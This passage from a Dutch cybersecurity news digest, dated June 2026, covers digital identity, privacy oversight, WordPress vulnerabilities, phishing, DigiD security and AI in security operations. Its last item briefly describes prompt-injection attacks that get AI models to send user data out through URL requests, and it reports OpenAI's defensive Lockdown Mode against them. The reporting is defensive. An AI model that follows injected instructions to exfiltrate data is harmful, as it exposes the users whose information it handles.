De overgang naar eSIMs biedt dus niet alleen gemak en flexibiliteit, maar ook verbeterde bescherming tegen veelvoorkomende SIM-gerelateerde aanvallen, wat relevant is voor alle gebruikers in Nederland en België.

 

Bron: Deze informatie is afkomstig van een anonieme tip aan Cybercrimeinfo

05 juni 2026 | Kamervragen over verplicht Apple- of Google account voor overheidswallet

In de Tweede Kamer zijn vragen gesteld aan minister Heerma van Binnenlandse Zaken over de verplichting van een account van Apple of Google voor het gebruik van de Nederlandse overheidswallet, bekend als NL Wallet. Deze wallet wordt momenteel ontwikkeld als onderdeel van de Europese digitale identiteit. GroenLinks-PvdA, vertegenwoordigd door Kamerlid Kathmann, zoekt opheldering van de minister en heeft een garantie gevraagd dat de NL Wallet de rol van DigiD in de toekomst niet zal overnemen zolang een account van Apple of Google verplicht is voor het gebruik ervan.

De Europese Commissie introduceerde in 2021 plannen voor een digitale identiteit waarmee burgers zich binnen de gehele Europese Unie kunnen identificeren. Via een speciale wallet app voor smartphones en andere apparaten moeten burgers in staat zijn om zich te identificeren en elektronische documenten te delen. Grote platforms zullen in de toekomst verplicht worden deze nieuwe Europese digitale identiteit te accepteren.

De afgelopen maanden is er vanuit verschillende hoeken, waaronder op het platform Hacker News, bezorgdheid geuit over het feit dat de wallet apps die de EU landen ontwikkelen, een account van Apple of Google vereisen om te functioneren. Dit geldt ook voor de Nederlandse NL Wallet. Een woordvoerder van staatssecretaris Aerdts voor Digitale Economie heeft echter tegenover Follow the Money aangegeven dat er wordt gekeken naar het ondersteunen van gebruikers van andere ecosystemen. De intentie is om deze opties grondig te bestuderen en, mits veilig bevonden, te implementeren voordat de wallet live gaat.

Kamerlid Kathmann van GroenLinks-PvdA heeft de minister gevraagd of hij de mening deelt dat ook mensen zonder telefoons van Google of telefoons met een Apple ID de NL Wallet zouden moeten kunnen gebruiken. Zij wil weten of deze mogelijkheden zijn onderzocht tijdens de ontwikkeling en, zo ja, waarom dan toch voor de huidige technische voorwaarden is gekozen. Indien niet verkend, vraagt zij naar de reden hiervan. Daarnaast benadrukt Kathmann het belang van toegankelijkheid, waarbij ze stelt dat ook mensen die geen smartphone willen of kunnen gebruiken, de NL Wallet app zouden moeten kunnen gebruiken.

De minister is ook gevraagd naar het verschil tussen DigiD en NL Wallet, aangezien DigiD wel toegankelijk is voor mensen zonder iPhone, Google account of smartphone. Kathmann wil weten waarom dit voor de NL Wallet niet mogelijk zou zijn. Verder vraagt zij de minister om de garantie dat organisaties die nu DigiD ondersteunen en de NL Wallet in de toekomst willen ondersteunen, DigiD ook naast de NL Wallet blijven aanbieden. Zij waarschuwt dat het niet bieden van deze garantie Nederlanders tot het gebruik van een Google account of Apple ID zou dwingen.

Tot slot heeft Kathmann de minister bevraagd over de afweging tussen het gemak van ontwikkeling en digitale soevereiniteit en toegankelijkheid, gezien de verplichte accounts van Apple of Google. De minister heeft drie weken de tijd gekregen om de gestelde vragen te beantwoorden.

 

Bron: github.com | Bron 2: grapheneos.org | Bron 3: f-droid.org

05 juni 2026 | Politie Den Haag start WhatsApp-kanaal voor burgers, privacyvragen rijzen

De Politie Eenheid Den Haag heeft een eigen WhatsApp-kanaal gelanceerd om burgers direct te informeren over diverse zaken. Deze stap volgt op de introductie van vergelijkbare kanalen door drie andere Nederlandse politie-eenheden, waarmee de Eenheid Den Haag de vierde is die deze communicatiemethode in gebruik neemt. Het doel van het kanaal is om burgers en de pers snel en direct van het laatste politienieuws te voorzien.

Vorig jaar was de Politie Eenheid Noord-Holland de eerste die een WhatsApp-kanaal startte. In maart en april van dit jaar volgden respectievelijk de Politie Eenheid Midden-Nederland en de Politie Eenheid Limburg. Via het kanaal wil de Eenheid Den Haag informatie delen over onder meer vermissingen en incidenten, naast het verspreiden van preventieboodschappen en veiligheidstips.

De politie benadrukt dat deze WhatsApp-kanalen losstaan van de reguliere chatfunctie van de applicatie. Telefoonnummers van zowel de beheerders als de volgers blijven onzichtbaar voor andere gebruikers, en geplaatste berichten zijn tot dertig dagen na publicatie beschikbaar.

De keuze voor WhatsApp roept echter ook vragen op binnen de gemeenschap, met name over privacy en de afhankelijkheid van commerciële techbedrijven. Diverse reacties wijzen op de potentiële implicaties van het gebruik van een platform van Meta, eigenaar van WhatsApp, voor dataverzameling en monitoring. Critici pleiten voor het gebruik van alternatieve, mogelijk veiligere of in Europa gehoste platforms, zoals Signal, Element of Threema, of zelfs een eigen website van de politie. Zij uiten hun bezorgdheid over het verder binden van overheidsinstanties aan Amerikaanse technologiegiganten, wat de digitale soevereiniteit zou kunnen ondermijnen.

Aan de andere kant stellen voorstanders dat het primaire doel van de politie is om burgers effectief te bereiken, en dat WhatsApp, gezien zijn wijdverspreide gebruik in Nederland, hiervoor het meest geschikte middel is. Zij argumenteren dat alternatieve platforms door een veel kleinere groep mensen worden gebruikt, waardoor het bereik van de politie aanzienlijk beperkt zou zijn. Deze discussie onderstreept de bredere uitdagingen waar overheidsinstanties mee kampen bij het navigeren tussen gebruiksgemak, bereik en de bescherming van privacy in het digitale tijdperk.

 

Bron: Politie Eenheid Den Haag | Bron 2: mastodon.social

05 juni 2026 | Kabinet: AP heeft voldoende middelen voor AVG-toezicht, AP spreekt van tekort

Het kabinet is van mening dat de Autoriteit Persoonsgegevens (AP) over voldoende middelen beschikt om haar taken met betrekking tot het toezicht op en de handhaving van de Algemene Verordening Gegevensbescherming (AVG) en de Uitvoeringswet Algemene Verordening Gegevensbescherming (UAVG) uit te voeren. Dit standpunt is kenbaar gemaakt in antwoord op Kamervragen van D66.

D66 had de vragen gesteld naar aanleiding van recente datalekken bij bedrijven zoals Basic-Fit en Booking.com. De partij wilde van staatssecretaris Van Bruggen van Justitie en Veiligheid weten of de toezicht- en handhavingscapaciteit van de AP toereikend is om een structurele naleving van de AVG af te dwingen.

Staatssecretaris Van Bruggen stelde in haar antwoord dat de AP zelf de vrijheid heeft om de middelen die het voor AVG-toezicht ontvangt, te verdelen over de verschillende toezichtstaken. Zij voegde eraan toe dat het kabinet samen met de AP stappen wil ondernemen om een meer objectieve basis te creëren voor besluiten over het budget van de toezichthouder. Een landenvergelijkend onderzoek zou hierbij een nuttig instrument kunnen zijn.

Het standpunt van het kabinet contrasteert met de herhaaldelijke uitingen van de AP zelf. In het Jaarverslag over 2025, dat afgelopen april werd gepubliceerd, meldt de privacytoezichthouder meerdere malen dat het te kampen heeft met een capaciteitstekort. De AP stelt dat het in veel gevallen noodzakelijk of gewenst is om nader onderzoek te verrichten, maar dat dit door de beperkte capaciteit niet altijd mogelijk is.

Als gevolg van dit capaciteitstekort onderzoekt de AP alleen de datalekken die de grootste risico’s voor slachtoffers met zich meebrengen. Het Jaarverslag benadrukt ook het belang van verdiepende onderzoeken, waarbij de AP veel kan betekenen voor zowel individuen als de samenleving. Echter, de ruimte voor dergelijke verdiepende onderzoeken wordt beperkt door de beschikbare capaciteit, wat dwingt tot scherpe keuzes en betekent dat niet alle geschikte zaken in dezelfde mate kunnen worden opgepakt. Bovendien heeft het capaciteitstekort geleid tot een achterstand bij de behandeling van klachten die tegen de AP zijn ingediend.

 

Bron: Tweede Kamer

05 juni 2026 | Datalek niet automatisch AVG-overtreding volgens staatssecretaris

Staatssecretaris Van Bruggen van Justitie en Veiligheid heeft verklaard dat een datalek niet automatisch neerkomt op een overtreding van de Algemene Verordening Gegevensbescherming (AVG). Deze reactie volgde op Kamervragen van D66 en JA21 naar aanleiding van recente datalekken bij bedrijven zoals Basic-Fit en Booking.com.

D66 informeerde bij de staatssecretaris of de incidenten duidden op structurele tekortkomingen in de beveiliging van persoonsgegevens bij de getroffen bedrijven. Van Bruggen stelde zich voorzichtig op en benadrukte dat elk incident een unieke oorzaak kan hebben. Ze wees erop dat zelfs goed beveiligde organisaties, overheden en bedrijven kwetsbaar kunnen zijn voor zeer geavanceerde cyberaanvallen. De bewindsvrouw was het niet eens met de suggestie dat herhaalde datalekken wijzen op onvoldoende structurele naleving van de AVG, en herhaalde dat een datalek op zich niet betekent dat er sprake is van een overtreding van de verordening.

Volgens de staatssecretaris is de manier waarop bedrijven reageren na de vaststelling van een datalek cruciaal. Dit omvat het implementeren van (extra) beveiligingsmaatregelen, het voldoen aan de meldingsplicht en het transparant communiceren met de betrokkenen. Op de vraag van D66 of zij bereid was strengere, afdwingbare beveiligingsnormen in te voeren voor organisaties die op grote schaal persoonsgegevens verwerken, antwoordde Van Bruggen dat de AVG reeds voldoende normen biedt voor passende beveiligingsmaatregelen voor alle organisaties en bedrijven die (op grote schaal) persoonsgegevens verwerken.

JA21 had ook opheldering gevraagd over het datalek bij Basic-Fit en wilde onder andere weten of de AVG of de handhaving daarvan aangescherpt moest worden. Van Bruggen gaf aan geen aanwijzingen te zien voor lacunes in de gegevensbeschermingswetgeving, mede gezien de brede werkingssfeer van de AVG. Zij meent dat het probleem eerder ligt bij de naleving van de bestaande regelgeving, en dat tekortkomingen in voorkomende gevallen toe te schrijven zijn aan diverse andere factoren dan aan de bepalingen van de AVG zelf.

De uitspraken van de staatssecretaris benadrukken het complexe karakter van databeveiliging en de interpretatie van wettelijke verplichtingen in een steeds veranderend dreigingslandschap.

 

Bron: Tweede Kamer

05 juni 2026 | NCSC waarschuwt voor datalekken door misconfiguraties

Het Nationaal Cyber Security Centrum (NCSC) heeft een waarschuwing uitgegeven aan organisaties over het toenemende risico op datalekken als gevolg van misconfiguraties. De overheidsinstantie constateert dat bedrijven steeds vaker hun gevoelige informatie, zoals klantgegevens, financiële data en interne documenten, onderbrengen in SaaS- en cloudomgevingen. Hoewel deze omgevingen voordelen bieden op het gebied van snelheid, schaalbaarheid en toegankelijkheid, kan één verkeerde configuratie-instelling volstaan om deze informatie onbedoeld toegankelijk te maken voor buitenstaanders.

Voorbeelden van dergelijke misconfiguraties zijn gastgebruikers met te ruime toegangsrechten, API's die zonder de vereiste authenticatie benaderbaar zijn, of standaardconfiguraties die na de initiële uitrol nooit zijn aangescherpt. Het NCSC merkt op dat kwaadwillenden geautomatiseerd en op grote schaal het internet afspeuren naar dergelijke kwetsbaarheden. De afgelopen maanden heeft het NCSC diverse incidenten waargenomen waarbij aanvallers door een misconfiguratie gevoelige informatie hebben buitgemaakt, waarna organisaties met deze gestolen data werden afgeperst.

Het NCSC benadrukt dat misconfiguraties geen nieuw fenomeen zijn en vaak onder tijdsdruk ontstaan. Juist daarom vereisen zij structurele aandacht in plaats van slechts incidentele controles. De overheidsinstantie adviseert organisaties om een actueel overzicht te creëren van alle gebruikte platformen, cloudomgevingen en applicaties. Daarnaast moeten configuratie-instellingen en toegangsrechten nauwkeurig in kaart worden gebracht. Specifieke aanbevelingen omvatten het toepassen van het ‘least privilege’-principe, het strikt scheiden van admin accounts en gebruikersaccounts, het uitschakelen van anonieme toegang wanneer dit niet strikt noodzakelijk is, en gerichte aandacht voor gastaccounts en de rechten van applicaties. Bovendien dient voor alle admin accounts multifactorauthenticatie verplicht te worden gesteld.

 

Bron: NCSC

06 juni 2026 | EU onthult technologiepakket om afhankelijkheid van buitenlandse leveranciers te verminderen

De Europese Commissie heeft deze week een uitgebreid pakket aan wetten en strategieën voorgesteld, gericht op het verminderen van de afhankelijkheid van de Europese Unie van buitenlandse technologie. Deze stap komt voort uit de groeiende bezorgdheid dat de langdurige technologische afhankelijkheden van de EU een kwetsbaarheid vormen voor de veiligheid. Het pakket omvat diverse sectoren, waaronder halfgeleiders, cloud computing, kunstmatige intelligentie en open source software.

Henna Virkkunen, de technologieleider van de Commissie, omschreef de voorstellen als "een belangrijke verschuiving in de benadering van technologische soevereiniteit door Europa." Het pakket bestaat uit twee wetsontwerpen - een Chips Act 2.0 en een Cloud en AI Development Act (CADA) - aangevuld met een Open Source Strategie en een routekaart voor de digitalisering van het energiesysteem. Samen zijn deze initiatieven bedoeld om "de keuze in kerntechnologieën voor EU-bedrijven, burgers en overheidsdiensten te verbreden." Virkkunen benadrukte de onlosmakelijke verbinding tussen geopolitiek en technologie, en stelde dat Europa een leidende rol moet spelen in technologische innovatie. Zij stelde dat het tijd is voor Europa om controle te krijgen over zijn data, toeleveringsketens en toekomst, en zijn digitale autonomie en veerkracht te versterken.

Volgens de Commissie is de EU voor meer dan 80% van haar essentiële digitale producten, diensten, infrastructuur en intellectueel eigendom afhankelijk van landen buiten de Unie. De drang om de dominantie van Amerikaanse en Chinese leveranciers te verminderen, wordt mede ingegeven door verslechterende internationale betrekkingen en de vrees dat deze afhankelijkheid als wapen kan worden ingezet.

Op het gebied van open source veiligheid streeft de Commissie ernaar om Europese open source alternatieven op te schalen in prioritaire gebieden, waaronder expliciet cybersecurity. Er zal financiering beschikbaar komen voor het langdurige onderhoud en de beveiliging van kritieke Europese open source infrastructuur. Dit is een reactie op incidenten zoals de XZ Utils backdoor, die de kwetsbaarheid van ondergefinancierde open source componenten aantoonde. De strategie bouwt voort op de meer dan drie miljoen Europese open source bijdragers en moedigt overheidsdiensten aan om open source tools te gebruiken via aanbestedingsrichtlijnen en een open internetstack. Hoewel Amerikaanse bedrijven de Europese cybersecuritymarkt domineren, ziet Alexandra Paulus van het Duitse Instituut voor Internationale en Veiligheidszaken de financiering van open source veiligheid als een potentiële basis voor Europese leveranciers.

Wat betreft chipsoevereiniteit blijft Europa sterk afhankelijk van derde landen voor geavanceerde productie en chipontwerp. De Chips Act 2.0 introduceert concrete instrumenten om de kloof in productiecapaciteit te dichten. Deze wet vereist dat nationale overheden de planning, milieu- en regelgevende goedkeuringen voor nieuwe fabricagefabrieken binnen twaalf maanden afronden, en voorziet in staatssteun voor "eerste-in-hun-soort" faciliteiten die nog niet aanwezig zijn in de EU. De oorspronkelijke Chips Act uit 2023 mobiliseerde meer dan 52 miljard euro aan publieke en private investeringen, maar schoot tekort in het bereiken van de doelstelling van 20% van de wereldwijde halfgeleiderproductie tegen 2030. Voor chipontwerp rekent de Commissie op vraagstimulering, door orders van door de EU gefinancierde datacenters en AI gigafabrieken te gebruiken om chipontwerpers naar Europa te trekken. De Commissie verwacht dat AI-gerelateerde componenten tegen 2030 meer dan 70% van de halfgeleidermarkt zullen uitmaken.

 

Bron: Europese Commissie | Bron 2: digital-strategy.ec.europa.eu | Bron 3: swp-berlin.org

06 juni 2026 | Meer dan 2700 kwetsbaarheden gevonden in WordPress plugins in eerste kwartaal

In het eerste kwartaal van dit jaar zijn ruim 2700 beveiligingslekken ontdekt in plug-ins voor WordPress. Dit blijkt uit onderzoek van cybersecuritybedrijf Wordfence. Vooral kwetsbaarheden zoals cross-site scripting (XSS) en SQL Injection vormen een aanzienlijk probleem. Wordfence benadrukt ook dat een groot deel van de gevonden lekken niet wordt gepatcht door de betreffende ontwikkelaars.

Wordfence registreerde in de eerste drie maanden van 2026 precies 2738 kwetsbaarheden in plug-ins voor WordPress. Dit is een stijging van ongeveer 24 procent vergeleken met het voorgaande kwartaal. De meestvoorkomende problemen die werden geïdentificeerd, zijn ontbrekende autorisatie, cross-site scripting, remote file inclusion en SQL Injection. Wordfence heeft al deze kwetsbaarheden gerapporteerd aan de ontwikkelaars van de betreffende plug-ins. Echter, aan het einde van het eerste kwartaal waren 747 van deze beveiligingslekken nog steeds niet verholpen. Bovendien bleek dat dertien procent van de kwetsbaarheden werd gevonden in plug-ins die niet langer worden onderhouden door hun ontwikkelaars, wat het risico op langdurige onveiligheid vergroot.

De bevindingen zijn bijzonder relevant gezien de wijdverspreide adoptie van WordPress; volgens W3Techs draait meer dan veertig procent van alle websites op internet op dit contentmanagementsysteem. Aanvallers maken actief misbruik van veel van deze kwetsbaarheden om beheerdersaccounts toe te voegen, waarmee zij volledige controle over de getroffen websites kunnen verkrijgen. Een specifiek lek in de plug-in SureTriggers, dat dit mogelijk maakte, werd op grote schaal uitgebuit.

Wordfence analyseerde ook welke typen kwetsbaarheden het meest werden aangevallen. Meer dan de helft van de aanvallen betrof SQL Injection, gevolgd door path traversal en cross-site scripting. Deze cijfers onderstrepen de noodzaak voor beheerders om hun plug-ins en thema's voor WordPress consequent up-to-date te houden om de veiligheid van hun websites te waarborgen.

 

Bron: Wordfence

06 juni 2026 | Servicedegradatie Microsoft 365 omzeilde automatische driverupdates van Windows

Microsoft heeft een servicedegradatieprobleem binnen Microsoft 365 opgelost, dat tijdelijk de automatische driverupdatecontroles van Windows omzeilde. Dit leidde tot onbedoelde driverinstallaties op beheerde apparaten. Het probleem trof Windows-apparaten die waren geconfigureerd met beleid om automatische updates te voorkomen, met name in bedrijfsomgevingen waar strikte controlemethoden voor updates worden gehandhaafd.

Ondanks deze controles merkten sommige gebruikers op dat drivers werden geïnstalleerd zonder administratieve goedkeuring, wat zorgen opriep over de handhaving van beleid en de integriteit van endpoints. Het incident, dat werd bijgehouden onder Microsoft-referentie MO1332784 en NHSmail-referentie INC46841357, werd voor het eerst gemeld op 3 juni 2026 en officieel opgelost op 4 juni 2026.

Volgens het onderzoek van Microsoft lag de hoofdoorzaak bij een storing in een cachingdienst die door Windows Update wordt gebruikt. Deze dienst liet tijdelijk informatie over apparaatinschrijving vallen, wat cruciaal is voor het identificeren van systemen die worden beheerd onder bedrijfsbeleid, zoals Microsoft Intune of andere MDM-oplossingen. Toen deze inschrijvingsdata verloren ging, werden de getroffen systemen ten onrechte geclassificeerd als niet-ingeschreven apparaten. Als gevolg hiervan werden standaardbeperkingen voor drivergoedkeuring niet toegepast, waardoor drivers automatisch konden worden geïnstalleerd.

Microsoft heeft verduidelijkt dat alle drivers die gedurende deze periode werden geïmplementeerd, officieel waren ondertekend en goedgekeurd door Microsoft. Het bedrijf benadrukte dat deze drivers geen directe beveiligingsdreiging vormden, aangezien ze de standaardvalidatie- en ondertekeningsprocessen van Microsoft hadden doorlopen. Het incident onderstreept echter een aanzienlijk hiaat in de mechanismen voor beleidshandhaving, vooral in omgevingen die afhankelijk zijn van strikte compliance- en wijzigingscontroleprocedures.

Vanuit een beveiligingsperspectief, hoewel er geen kwaadaardige activiteit bij betrokken was, roept de gebeurtenis vragen op over vertrouwensgrenzen en updatekanalen. Ongeautoriseerde of onverwachte wijzigingen in systeemdrivers kunnen nog steeds de stabiliteit van systemen, compatibiliteit en auditcompliance beïnvloeden. In gereguleerde sectoren zoals de gezondheidszorg en financiële dienstverlening kunnen zelfs goedgekeurde wijzigingen buiten gedefinieerde processen leiden tot incidentevaluaties.

Microsoft heeft verklaard dat het probleem volledig is verholpen na validatie van getroffen gebruikers. Systemen hebben hun normale gedrag hervat en geconfigureerde beleidsregels regelen opnieuw de driverinstallaties. Het bedrijf zet zijn interne evaluatie voort om te begrijpen hoe de storing van de cachingdienst is opgetreden en om de veerkracht tegen vergelijkbare verstoringen te verbeteren. Dit incident dient als een herinnering dat zelfs vertrouwde updatemechanismen operationele risico's kunnen introduceren wanneer onderliggende servicedependenties falen. Beveiligingsteams wordt geadviseerd om endpointlogs te controleren op onverwachte driverinstallaties gedurende de getroffen periode en ervoor te zorgen dat monitoring is ingesteld om beleidsafwijkingen te detecteren. De voortdurende analyse van Microsoft zal naar verwachting leiden tot verbeteringen in detectie- en herstelmechanismen binnen de Windows Update-diensten, waardoor de kans op vergelijkbare problemen bij toekomstige implementaties wordt verkleind.

 

Bron: Microsoft

06 juni 2026 | Lage tevredenheid over waarde AI in Security Operations Centers

Uit recent onderzoek blijkt dat, ondanks een snelle adoptie van kunstmatige intelligentie (AI) in Security Operations Centers (SOCs), de gerapporteerde waarde ervan in de praktijk vaak tegenvalt. Achtien maanden geleden was de term 'AI SOC' nog een marketingterm, maar inmiddels is het een vast onderdeel van het budget, met miljardeninvesteringen in AI-gestuurde security operations platforms, agent-gebaseerde SOC tools en AI co-pilots die in elke laag van de security stack zijn geïntegreerd. De sector ziet een recordtempo in de aankoop, implementatie en ingebruikname van AI functionaliteiten.

Desondanks melden dezelfde SOCs die een recordadoptie van AI rapporteren, tegenvallende resultaten. Het eerste objectieve benchmarkonderzoek naar de waarde van AI in het SOC, de SOC-CMM 2026 Maturity Report, werd in mei gepubliceerd. Dit rapport is gebaseerd op enquêtegegevens die tussen eind januari en half maart 2026 zijn verzameld bij ongeveer 200 SOCs in verschillende regio's, sectoren en leveringsmodellen. Slechts ongeveer 10% van de respondenten gaf aan dat AI uitstekende waarde heeft geleverd aan hun SOC. Ongeveer 19% rapporteerde goede waarde, terwijl de resterende 71% aangaf enige of helemaal geen waarde te hebben ervaren.

Deze resultaten, anderhalf jaar na de grootschalige implementatie van AI, wijzen op een structureel probleem. De SOC-CMM 2026 data toont drie belangrijke bevindingen die met elkaar samenhangen. Ten eerste is de adoptie van AI toegenomen in elke categorie die binnen het SOC wordt gebruikt, namelijk kant-en-klare grote taalmodellen groeiden met 55% op jaarbasis, AI co-pilots met 145%, AI agents met 118%, supervised machine learning met 96% en aangepaste LLMs met 64%. Dit suggereert dat SOC teams overmatig investeren in AI zonder de operationele volwassenheid om er waarde uit te halen.

Ten tweede is het dominante adoptiepatroon wat het rapport het 'taker model' noemt, oftewel kant-en-klare AI die binnen een bestaande security stack wordt ingezet zonder maatwerk. Ongeveer 65% van de ondervraagde SOCs beschrijft zichzelf als 'takers'. Nog eens 20% zijn 'shapers', die hun aankopen aanpassen, en slechts 15% zijn 'builders', die modellen trainen met hun eigen data. De 'takers' vormen de grootste groep en rapporteren de minste waarde. Dit patroon is consistent voor hybride SOCs, in huis SOCs en MSSP SOCs, wat duidt op een structurele oorzaak.

Ten derde constateert het rapport dat de twee grootste uitdagingen voor SOC verbetering die jaar op jaar toenamen, een gebrek aan best practices (+17%) en de complexiteit van het verhogen van volwassenheid (+11%) zijn. Alle andere uitdagingen, zoals gebrek aan budget of management ondersteuning, daalden. Dit duidt erop dat SOCs niet zozeer te weinig geld of support hebben, maar eerder niet weten wat ze met de aangeschafte AI moeten doen, wat de kloof in AI volwassenheid illustreert.

De eerste golf van AI tools in het SOC werd vaak geïmplementeerd als extra functionaliteiten die aan bestaande security producten werden toegevoegd. SIEMs kregen AI triage, EDRs kregen AI onderzoek, SOAR platforms kregen AI playbook generatie en ticketing tools kregen AI samenvatting. Hoewel elk van deze functionaliteiten op zichzelf werkte, deelden ze geen context met elkaar. Dit resulteert er in de praktijk in dat SOC analisten nu meerdere AI assistenten hebben die niet met elkaar communiceren. De triage agent in de SIEM weet niet wat de detectie engineer vorige week heeft stilgelegd, en de dreigingsjacht agent in de EDR weet niet wat het dreigingsinformatie team die ochtend heeft gemeld. Dit versnelt individuele taken, maar lost de overdracht tussen de verschillende stadia van de workflow niet op, waar de meeste SOC tijd en waarde verloren gaat.

De SOC-CMM 2026 rapportcijfers bevestigen deze dynamiek. Het technologiedomein scoort het hoogst met gemiddeld 2.7 van de 5, terwijl het procesdomein (waar de overdrachten plaatsvinden) en het mensdomein (institutionele kennis en besluitvorming) beide 2.3 scoren. Het aanschaffen van meer tools, inclusief AI tools, verbetert deze cijfers niet; in sommige gevallen maakt het de situatie zelfs slechter door het toevoegen van extra overdrachtsmomenten.

De 10% van de SOCs die wel uitstekende waarde uit AI halen, gebruiken AI binnen een andere architectuur. Drie factoren onderscheiden hen, namelijk AI die opereert over de gehele SOC levenscyclus (dreigingsinformatie, dreigingsjacht, detectie, onderzoek en remediëring), in plaats van binnen één stadium. Wanneer agents context delen over alle vijf de stadia, versterkt dit de effectiviteit van het SOC. Elk afgerond onderzoek kalibreert de volgende detectie, elk resultaat van dreigingsjacht werkt de volgende intelligentiecyclus bij, en elke remediëring voedt het playbook van de volgende agent. Een dergelijke verbonden structuur levert duurzame waarde op. Deze succesvolle SOCs hebben AI architecturen die lijken op een geïntegreerd geheel, terwijl minder succesvolle SOCs meer een stapel losse functionaliteiten hebben. Daarnaast is hun AI in staat om te leren van de dynamische omgeving waarin het opereert, wat leidt tot relevantere onderzoeksresultaten.

 

Bron: SOC-CMM

06 juni 2026 | Waarschuwing voor spearphishing via WhatsApp bij hotelboekingen

Safeonweb waarschuwt voor een toename van frauduleuze berichten die via WhatsApp worden verstuurd naar personen met een actieve hotel- of B&B-reservering. Diverse meldingen van hotels en bed & breakfasts wijzen op een gerichte oplichtingsmethode waarbij klanten een ogenschijnlijk legitiem verzoek tot betaling ontvangen. Deze berichten bevatten accurate details over de boeking, zoals de naam van de gast, het referentienummer, de datum van het verblijf en de naam van de accommodatie, wat de fraude moeilijk herkenbaar maakt.

De oplichters sturen berichten met de dringende mededeling dat een betaling vereist is om de reservering te bevestigen of te behouden. Door het gebruik van persoonlijke en correcte boekingsinformatie wekken de berichten de indruk dat ze afkomstig zijn van het hotel, de B&B of het gebruikte boekingsplatform. Deze werkwijze staat bekend als spearphishing, een verfijnde vorm van phishing waarbij persoonlijke gegevens worden ingezet om de geloofwaardigheid van het valse bericht te vergroten, in tegenstelling tot algemene phishingpogingen die breed worden verspreid.

De herkomst van de gepersonaliseerde gegevens is momenteel onbekend, maar Safeonweb vermoedt dat de oplichters deze hebben verkregen via een datalek of door middel van gestolen data. De precieze bron van deze diefstal van data is nog niet vastgesteld. Soortgelijke incidenten zijn ook in andere landen waargenomen.

Gebruikers die een verdacht bericht via WhatsApp ontvangen met een verzoek tot betaling betreffende een hotel- of B&B-reservering, dienen uiterst voorzichtig te zijn. Er wordt geadviseerd om nooit via een link in het bericht te betalen, niet op de link te klikken en geen bankgegevens of kaartgegevens in te vullen. In plaats daarvan wordt aangeraden direct contact op te nemen met de betreffende accommodatie via de officiële contactgegevens die op de officiële website of via het oorspronkelijke platform voor de boeking te vinden zijn. Daarnaast kunnen verdachte berichten worden doorgestuurd naar verdacht@safeonweb.be. Indien er reeds geld is gestolen, is het cruciaal om onmiddellijk contact op te nemen met de bank en aangifte te doen bij de politie.

Het is van groot belang te onthouden dat de aanwezigheid van correcte persoonlijke informatie in een bericht geen garantie biedt voor de echtheid ervan. Zelfs wanneer de naam, datum en gegevens van de reservering kloppen, blijft voorzichtigheid geboden bij dringende verzoeken tot betaling via WhatsApp.

 

Bron: Safeonweb

06 juni 2026 | Overheid breidt versleuteling van DigiD uit en gaat platform van Solvinity monitoren

De Nederlandse overheid heeft besloten de versleuteling van DigiD uit te breiden en de monitoring van het Solvinity-platform te intensiveren. Deze maatregelen volgen op een kwetsbaarheidsscan die werd uitgevoerd nadat de Amerikaanse overnameplannen van Solvinity bekend werden. Staatssecretaris Van der Burg van Binnenlandse Zaken heeft dit in een brief aan de Tweede Kamer uiteengezet.

Eind vorig jaar informeerde Solvinity Logius, de overheidsinstantie die DigiD en MijnOverheid ontwikkelt en beheert, over de voorgenomen overname door het Amerikaanse Kyndryl. Na deze mededeling liet Logius direct een kwetsbaarheidsscan uitvoeren, gezien het feit dat DigiD, MijnOverheid en het beveiligde communicatiesysteem van het ministerie van Justitie en Veiligheid op servers van Solvinity draaien.

Op basis van de resultaten van de scan is besloten tot een reeks beveiligingsverbeteringen. Specifiek wordt de versleuteling van DigiD uitgebreid met aanvullende versleuteling van persoonsgegevens in de database van DigiD, extra versleuteling van persoonsgegevens in de logging, en aanvullende versleuteling van persoonsgegevens vóór opslag op de storage van Solvinity. De voorbereidingen en inplanning van de werkzaamheden voor de extra databaseversleuteling zijn in volle gang, terwijl de overige genoemde versleutelingsmaatregelen reeds door DigiD zijn doorgevoerd.

Daarnaast wordt de monitoring van het Solvinity-platform uitgebreid. Dit omvat een verdere uitbreiding van het aantal detectieregels en het onderbrengen van deze monitoring bij het Security Operations Center (SOC) van Logius. Deze werkzaamheden staan voor de komende maanden gepland.

Het kabinet heeft inmiddels de beoogde Amerikaanse overname van Solvinity verboden. De huidige beheerovereenkomst voor DigiD met Solvinity is verlengd tot augustus 2028. Voor toekomstige aanbestedingen zal de Aanbestedingswet Defensie en Veiligheid (ADV) worden toegepast. Deze wet biedt de overheid meer mogelijkheden dan een reguliere Europese aanbesteding om risico's voor de nationale veiligheid te beperken, zoals het uitsluiten van partijen uit landen met wetgeving die het opvragen van data van Nederlandse burgers mogelijk maakt. Logius bereidt momenteel de uitvoering van de aanbesteding voor.

Staatssecretaris Van der Burg benadrukt het belang van deze maatregelen: "Logius, en DigiD, zijn een belangrijk deel van onze digitale dienstverlening. Zo wordt DigiD inmiddels door meer dan 16,5 miljoen mensen gebruikt. Het is goed om grip te hebben op de systemen waar Nederlanders dagelijks mee te maken hebben." De Tweede Kamer zal opnieuw worden geïnformeerd wanneer de aanbesteding is toegekend.

 

Bron: Rijksoverheid

07 juni 2026 | ChatGPT introduceert 'Lockdown Mode' tegen datadiefstal via prompt injection

OpenAI heeft de uitrol van een nieuwe 'Lockdown Mode' voor ChatGPT aangevat, beschikbaar voor in aanmerking komende persoonlijke accounts. Deze functionaliteit is ontworpen om het risico op datadiefstal, dat voortkomt uit aanvallen via prompt injection, te verminderen. De modus is primair bedoeld voor individuen en organisaties die met gevoelige gegevens werken en behoefte hebben aan strengere beveiligingsgaranties. Gebruikers met een Free, Go, Plus, Pro of self-service ChatGPT Business abonnement kunnen van de Lockdown Mode gebruikmaken.

Volgens OpenAI is de Lockdown Mode een optionele, geavanceerde beveiligingsinstelling die de functionaliteiten van tools en mogelijkheden binnen producten van OpenAI, die verbinding kunnen maken met het internet of externe diensten, beperkt. Het hoofddoel is om het risico op datadiefstal te verminderen door uitgaande netwerkverzoeken te limiteren, al gaat dit ten koste van het uitschakelen of beperken van bepaalde nuttige functies.

De nieuwe beveiligingsmaatregelen zijn gericht op het verharden van het aanvalsoppervlak tegen prompt injections, een probleem dat nog steeds als een 'frontier'-uitdaging wordt beschouwd voor alle grote taalmodellen (LLM's). Deze maatregelen bouwen voort op sandboxing en bestaande controles om mechanismen voor datadiefstal via URL's te bestrijden. Het idee is niet om prompt injections volledig te voorkomen, noch verandert de modus de werking van geheugen, bestandsuploads of de mogelijkheid om gesprekken te delen. In plaats daarvan is het doel om potentiële routes waarlangs data kan worden geëxfiltreerd, te elimineren.

